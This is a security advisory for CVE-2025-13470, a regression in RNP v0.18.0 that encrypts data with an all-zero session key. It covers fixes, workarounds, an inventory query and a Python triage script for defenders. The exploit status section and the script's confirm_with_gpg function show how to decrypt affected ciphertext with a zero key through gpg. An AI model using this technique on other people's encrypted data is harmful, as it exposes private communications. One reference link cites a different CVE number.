CVE-2025-13470
📋 TL;DR
A regression in RNP v0.18.0 causes the session key carried in every public-key encrypted session key (PKESK) packet to be all-zero bytes, so anyone holding the ciphertext can decrypt data that this version encrypted to public keys, without the recipient's private key. Confidentiality of that data is fully compromised. Only data encrypted by RNP v0.18.0 using public keys is affected, but it stays decryptable regardless of which software the recipient runs; passphrase-only (SKESK) encryption and other RNP versions are not affected.
💻 Affected Systems
- RNP (librnp, the Ribose OpenPGP library), version 0.18.0; applications that bundle or link librnp should check the embedded library version
⚠️ Manual Verification Required
Automated vulnerability scanning may not flag this CVE: the NVD entry carries no version ranges, so version-matching scanners have nothing to compare against.
Why? The vendor advisory (see References) identifies v0.18.0 as the only affected release, but that range has not been published in the NVD/CVE record, so check the installed version by hand:
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Update to v0.18.1 or later (see Fix & Mitigation) rather than waiting for a scanner match
⚠️ Risk & Real-World Impact
Worst Case
All data encrypted with public keys by v0.18.0 can be decrypted by anyone who obtains the ciphertext, without the private key: complete exposure of that data, including copies archived or captured before the fix was applied.
Likely Case
Anyone who intercepts or later obtains the ciphertext (captured traffic, mail archives, backups) can decrypt it trivially. Upgrading stops new exposure but does nothing for ciphertext already produced.
If Mitigated
Data encrypted only with a passphrase (SKESK, no PKESK packet) or with any other RNP version is unaffected. A message that carries both a PKESK and an SKESK should be treated as exposed, since the payload itself was encrypted with the zero session key.
🎯 Exploit Status
Exploitation needs only the ciphertext: decrypt the payload with an all-zero session key (for example with gpg --override-session-key, trying each AES key size, because with a v3 PKESK the cipher identifier sits inside the encrypted blob). No private key, authentication or special access is needed.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: v0.18.1
Vendor Advisory: https://github.com/rnpgp/rnp/releases/tag/v0.18.1
Restart Required: No OS reboot, but any long-running process that has librnp loaded must be restarted to pick up the fixed library.
Instructions:
1. Upgrade RNP to version 0.18.1 or later.
2. Restart processes that use librnp.
3. Identify data that v0.18.0 encrypted to public keys, re-encrypt it with the fixed version, and delete the old ciphertext.
4. Treat the contents of that ciphertext as disclosed to anyone who may hold a copy; rotate any secrets it contained.
🔧 Temporary Workarounds
Use passphrase encryption
All platforms: temporarily use passphrase-based encryption (SKESK) instead of public-key encryption until patched.
Downgrade to previous version
Linux: revert to RNP 0.17.x, the previous release series, which does not contain the regression.
For Arch Linux, if the previous package is still in the pacman cache: sudo pacman -U /var/cache/pacman/pkg/rnp-0.17.0-1-x86_64.pkg.tar.zst
🧯 If You Can't Patch
- Re-encrypt all data that v0.18.0 encrypted to public keys using a different, unaffected tool or version, and assume the original ciphertext is readable by anyone who holds a copy
- Isolate systems running v0.18.0, stop using them for public-key encryption, and restrict access to the ciphertext they produced
🔍 How to Verify
Check if Vulnerable:
rnp --version
Output of 0.18.0 means the installation is vulnerable. Where only the library is installed, check the package version (rnp or librnp in your package manager) or, from code, the string returned by the rnp_version_string() FFI call.
Verify Fix Applied:
After upgrade, rnp --version (or the package version) reports 0.18.1 or later, and processes that embed librnp have been restarted.
📡 Detection & Monitoring
Log Indicators:
- None specific to the bug: RNP does not log session-key contents, and a decryption with the zero key looks like any other successful decryption. Detection is inventory-driven.
- Package or asset inventory records showing rnp or librnp at version 0.18.0, or applications bundling that version.
Network Indicators:
- None: ciphertext on the wire is well-formed OpenPGP. Exposure only becomes visible to whoever attempts a zero-key decryption, so triage stored ciphertext offline rather than watching traffic.
Inventory Query (ECS field names; adapt to your SIEM):
package.name:(rnp OR librnp) AND package.version:"0.18.0"
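Because the bug leaves no log footprint, the practical detection step is to triage stored ciphertext. The script below is an added example written for this page; it is not code from RNP or Ribose. It parses a binary OpenPGP message (old and new packet headers, partial body lengths reassembled) and reports whether the session key is wrapped in a PKESK, which is what marks a message produced by RNP 0.18.0 as needing re-encryption. The optional confirmation step shells out to GnuPG's --override-session-key with an all-zero key for each AES key size and treats a passing integrity check as proof of exposure; it assumes gpg is on PATH and a v3 PKESK / SEIPD v1 message (for SEIPD v2 the cipher identifier is in the packet header, so the guessing loop does not apply). The packet fixtures, including the key ID 0123456789ABCDEF, are constructed filler with valid framing, not real ciphertext.

```python
"""Triage OpenPGP messages for CVE-2025-13470 exposure (added example, not RNP code).
triage(): is the session key wrapped in a PKESK?  If RNP 0.18.0 produced the message,
that session key is all zeros.  confirm_with_gpg(): prove it by decrypting with a zero
key through GnuPG's --override-session-key (assumes gpg on PATH, binary input)."""
import shutil
import subprocess
from typing import Dict, Iterator, List, Optional, Tuple

PKESK, SKESK, SED, SEIPD, AEAD = 1, 3, 9, 18, 20   # packet tags (RFC 4880 / RFC 9580)
ZERO_KEY_CANDIDATES = {7: 16, 8: 24, 9: 32}         # AES-128/192/256: algo id -> key bytes

def _new_length(data: bytes, pos: int) -> Tuple[int, int, bool]:
    """Decode a new-format length at pos -> (length, next_pos, is_partial)."""
    first = data[pos]
    if first < 192:
        return first, pos + 1, False
    if first < 224:
        return ((first - 192) << 8) + data[pos + 1] + 192, pos + 2, False
    if first == 255:
        return int.from_bytes(data[pos + 1:pos + 5], "big"), pos + 5, False
    return 1 << (first & 0x1F), pos + 1, True         # partial body length, more follow

def iter_packets(data: bytes) -> Iterator[Tuple[int, bytes]]:
    """Yield (tag, body) per packet: old/new headers, partial bodies reassembled."""
    pos = 0
    while pos < len(data):
        ctb, pos = data[pos], pos + 1
        if not ctb & 0x80:
            raise ValueError(f"not a packet header at offset {pos - 1}")
        if ctb & 0x40:                                # new format: chain of length fields
            tag, chunks, partial = ctb & 0x3F, [], True
            while partial:
                length, pos, partial = _new_length(data, pos)
                chunks.append(data[pos:pos + length])
                pos += length
        else:                                         # old format: 1/2/4-octet or indeterminate
            tag, n = (ctb >> 2) & 0x0F, (1, 2, 4, 0)[ctb & 0x03]
            length = int.from_bytes(data[pos:pos + n], "big") if n else len(data) - pos
            pos += n
            chunks = [data[pos:pos + length]]
            pos += length
        if pos > len(data):
            raise ValueError("truncated packet")
        yield tag, b"".join(chunks)

def pkesk_recipient(body: bytes) -> str:
    """Hex key ID (v3 PKESK) or fingerprint (v6 PKESK) the packet is addressed to."""
    if body[0] == 3:
        return body[1:9].hex().upper()
    if body[0] == 6:
        n = body[1]                                   # octets of key version + fingerprint
        return body[3:2 + n].hex().upper() if n else "anonymous"
    raise ValueError(f"unsupported PKESK version {body[0]}")

def triage(message: bytes) -> Dict[str, object]:
    """Report how a binary OpenPGP message wraps its session key and whether it is in scope."""
    recipients: List[str] = []
    skesk, container = 0, None
    for tag, body in iter_packets(message):
        if tag == PKESK:
            recipients.append(pkesk_recipient(body))
        elif tag == SKESK:
            skesk += 1
        elif tag in (SED, SEIPD, AEAD):               # ESK packets precede the ciphertext
            container = {SED: "SED", AEAD: "AEAD", SEIPD: f"SEIPD v{body[0]}"}[tag]
            break
    # A PKESK means public-key encryption: if RNP 0.18.0 produced the message, the
    # session key (and any SKESK copy of it in the same message) is all zeros.
    return {"pkesk_recipients": recipients, "skesk_count": skesk,
            "container": container, "exposed_if_from_rnp_0_18_0": bool(recipients)}

def zero_key_override(algo: int) -> str:
    """Value for gpg --override-session-key: '<algo>:<hex key>' with an all-zero key."""
    return f"{algo}:{'00' * ZERO_KEY_CANDIDATES[algo]}"

def confirm_with_gpg(path: str) -> Optional[int]:
    """Try a zero session key for each AES size; return the algo id whose MDC/AEAD check passed."""
    if shutil.which("gpg") is None:
        raise RuntimeError("gpg not found on PATH")
    for algo in ZERO_KEY_CANDIDATES:
        r = subprocess.run(["gpg", "--batch", "--quiet", "--override-session-key",
                            zero_key_override(algo), "--output", "-", "--decrypt", path],
                           capture_output=True)
        if r.returncode == 0:                         # wrong key decrypts to garbage and fails MDC
            return algo
    return None

def _packet(tag: int, body: bytes) -> bytes:         # new-format header, one-octet length
    return bytes([0xC0 | tag, len(body)]) + body

# Constructed fixtures: valid packet framing with filler bodies, not real ciphertext.
_PKESK_V3 = _packet(PKESK, b"\x03" + bytes.fromhex("0123456789ABCDEF") + b"\x01"
                    + (1024).to_bytes(2, "big") + b"\x80" + b"\x00" * 127)
_SKESK_V4 = _packet(SKESK, b"\x04\x09\x03\x08" + b"\x00" * 8 + b"\x60")
_SEIPD_V1 = _packet(SEIPD, b"\x01" + b"\x00" * 40)
PUBKEY_MESSAGE = _PKESK_V3 + _SEIPD_V1               # encrypted to RSA key ID 0123456789ABCDEF
PASSPHRASE_MESSAGE = _SKESK_V4 + _SEIPD_V1           # SKESK only: outside this bug
```

Feed it binary messages (for .asc files run gpg --dearmor first): triage(open(path, "rb").read()) over a mail archive's encrypted attachments lists the recipient key IDs and flags every PKESK-wrapped message as in scope, and confirm_with_gpg(path) then tells you which AES key size decrypted with the zero key. A None result for a file known to come from 0.18.0 means the message uses a cipher or packet version outside the candidates this check tries, not that it is safe.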
🔗 References
- https://access.redhat.com/security/cve/cve-2025-13402
- https://aur.archlinux.org/packages/rnp
- https://bugzilla.redhat.com/show_bug.cgi?id=2415863
- https://github.com/rnpgp/rnp/commit/7bd9a8dc356aae756b40755be76d36205b6b161a
- https://github.com/rnpgp/rnp/releases/tag/v0.18.1
- https://launchpad.net/ubuntu/+source/rnp
- https://open.ribose.com/advisories/ra-2025-11-20/
- https://packages.gentoo.org/packages/dev-util/librnp